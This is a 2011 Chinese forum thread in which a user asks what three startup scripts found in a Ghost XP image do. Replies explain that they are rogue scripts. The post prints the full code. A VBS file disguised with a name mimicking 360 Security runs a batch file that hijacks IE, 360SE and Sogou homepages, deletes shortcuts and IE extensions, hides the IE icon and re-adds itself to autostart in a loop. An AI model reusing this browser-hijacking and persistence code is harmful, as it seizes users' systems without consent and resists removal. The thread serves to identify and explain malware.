找回密码
 注册
搜索
[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
查看: 23133|回复: 6

[系统相关] [已解决]ghost版本的xp系统启动批处理起什么作用?

[复制链接]
发表于 2011-7-5 11:28:15 | 显示全部楼层 |阅读模式
装了1个ghost版本的xp系统。

在注册表里的run启动项目里面,有个 36O安全卫士.vbs。这个文件路径是C:\WINDOWS  


36O安全卫士.vbs文件内容是:


  1. on error resume next
  2. DIM objShell
  3. set objShell=wscript.createObject("wscript.shell")
  4. iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\sys.bat", 0, TRUE)



复制代码
sys.bat文件内容是:



  1. @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
  2. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
  3. @reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
  4. @reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f
  5. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ   /d "C:\Documents and Settings\Administrator\Favorites"
  6. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\My Documents"
  7. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Desktop" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\桌面"
  8. wscript.exe C:\WINDOWS\s.vbs
  9. attrib C:\WINDOWS\RocketDock\Settings.ini +s +r +h
  10. @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "RocketDock" /t REG_SZ /d "C:\WINDOWS\RocketDock\RocketDock.exe"
  11. copy "C:\WINDOWS\zm" "C:\Documents and Settings\All Users\桌面" /y
  12. del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.url"
  13. del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.lnk"
  14. copy "C:\WINDOWS\quick" "%appdata%\Microsoft\Internet Explorer\Quick Launch" /y
  15. reg delete "HKEY_CLASSES_ROOT\InternetShortcut" /v IsShortcut /f
  16. copy "C:\WINDOWS\Favorites" "c:\Documents and Settings\Administrator\Favorites" /y  
  17. copy "C:\WINDOWS\Favorites" "c:\Documents and Settings\All Users\Favorites" /y  
  18. @reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions" /f
  19. regedit -s C:\WINDOWS\gjl.reg
  20. copy "C:\WINDOWS\TheWorld\Internet Explorer.url" "C:\Documents and Settings\All Users\「开始」菜单\程序" /y  
  21. @echo off
  22. :loop
  23. wscript.exe C:\WINDOWS\,.vbs
  24. @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "36O安全卫士" /t REG_SZ /d "C:\WINDOWS\36O安全卫士.vbs"
  25. ping 127.1 -n 10 >nul 2>nul
  26. goto loop


复制代码
C:\WINDOWS  下面还有个,.vbs,内容是:


  1. on error resume next
  2. DIM objShell,Fso,TxtFl,Str,re
  3. Set objShell = CreateObject("WScript.Shell")
  4. objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"
  5. Set Fso = CreateObject("Scripting.FileSystemObject")
  6. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",1,False)
  7. Set re = new RegExp
  8. re.Pattern = "\s+HomePage=([\S\s]*?)\s+"
  9. re.Global = true
  10. re.IgnoreCase = true
  11. Str = re.Replace ( TxtFl.ReadAll,vbNewLine+"HomePage=http://www.2345li.com/?3"+vbNewLine)
  12. TxtFl.Close
  13. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",2,False)
  14. TxtFl.Write Str
  15. TxtFl.Close

  16. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",1,True)
  17. Set re = new RegExp
  18. re.Pattern = "homepage=""([\S\s]*?)"""
  19. re.Global = true
  20. re.IgnoreCase = true
  21. Str = re.Replace ( TxtFl.ReadAll,"homepage=""http://www.2345li.com/?3""")
  22. re.Pattern = "homepagetype=""([\S\s]*?)"""
  23. Str = re.Replace ( Str,"homepagetype=""3""")
  24. TxtFl.Close
  25. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",2,True)
  26. TxtFl.Write Str
  27. TxtFl.Close


复制代码

评分

参与人数 1PB +2 收起 理由
zm900612 + 2 感谢给帖子标题标注[已解决]字样

查看全部评分

 楼主| 发表于 2011-7-5 11:28:49 | 显示全部楼层
请教下,这3个文件,都是起什么作用的?谢谢
发表于 2011-7-5 11:49:03 | 显示全部楼层
起到流氓脚本的作用。
发表于 2011-7-5 11:50:23 | 显示全部楼层
具备流氓性质...至少我看见会删掉的...
 楼主| 发表于 2011-7-5 12:00:40 | 显示全部楼层
用360安全卫士杀掉的话,桌面就没有IE图标了啊。
发表于 2011-7-5 12:02:12 | 显示全部楼层
第一个脚本启动第二脚本
第二个脚本改主页并把第一个脚本添加到启动项
第三个脚本改主页并创建伪装ie图标

貌似这样,畜生写的(对流氓脚本的作者不用客气)。

评分

参与人数 1技术 +1 收起 理由
Batcher + 1 乐于助人

查看全部评分

发表于 2011-7-6 16:30:22 | 显示全部楼层
你叫360情何以堪,那可是个老流氓变得。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|批处理之家 ( 渝ICP备10000708号 )

GMT+8, 2026-3-18 02:44 , Processed in 0.020147 second(s), 8 queries , File On.

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表